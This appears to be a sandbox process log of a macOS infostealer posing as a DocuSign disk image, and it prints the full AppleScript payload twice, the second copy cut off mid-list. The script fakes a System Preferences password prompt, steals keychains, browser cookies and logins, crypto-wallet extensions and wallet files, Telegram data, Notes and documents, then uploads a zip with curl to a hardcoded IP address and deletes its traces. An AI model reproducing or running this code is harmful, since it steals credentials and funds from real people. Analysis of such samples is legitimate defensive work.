/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:515

/usr/bin/base64
base64 -D
1⤵
PID:519

/bin/sh
sh -c "rm -f '/tmp/.DocuSignWITWB'"
1⤵
PID:521

/bin/bash
sh -c "rm -f '/tmp/.DocuSignWITWB'"
1⤵
PID:521

/bin/rm
rm -f /tmp/.DocuSignWITWB
1⤵
PID:521

/bin/sh
sh -c "cp '/Volumes/DocuSignWITWB/.DocuSignWITWB' '/tmp/.DocuSignWITWB'"
1⤵
PID:522

/bin/bash
sh -c "cp '/Volumes/DocuSignWITWB/.DocuSignWITWB' '/tmp/.DocuSignWITWB'"
1⤵
PID:522

/bin/cp
cp /Volumes/DocuSignWITWB/.DocuSignWITWB /tmp/.DocuSignWITWB
1⤵
PID:522

/bin/sh
sh -c "xattr -c '/tmp/.DocuSignWITWB'"
1⤵
PID:523

/bin/bash
sh -c "xattr -c '/tmp/.DocuSignWITWB'"
1⤵
PID:523

/usr/bin/xattr
xattr -c /tmp/.DocuSignWITWB
1⤵
PID:523

/bin/sh
sh -c "chmod +x '/tmp/.DocuSignWITWB'"
1⤵
PID:524

/bin/bash
sh -c "chmod +x '/tmp/.DocuSignWITWB'"
1⤵
PID:524

/bin/chmod
chmod +x /tmp/.DocuSignWITWB
1⤵
PID:524

/bin/sh
sh -c "'/tmp/.DocuSignWITWB'"
1⤵
PID:525

/bin/bash
sh -c "'/tmp/.DocuSignWITWB'"
1⤵
PID:525

/tmp/.DocuSignWITWB
/tmp/.DocuSignWITWB
1⤵
PID:525

/bin/sh
sh -c "disown; pkill Terminal"
1⤵
PID:526

/bin/bash
sh -c "disown; pkill Terminal"
1⤵
PID:526
- /usr/bin/pkill
  pkill Terminal
  2⤵
  PID:527

/bin/sh
sh -c "osascript -e 'set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" '&"
1⤵
PID:528

/bin/bash
sh -c "osascript -e 'set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", 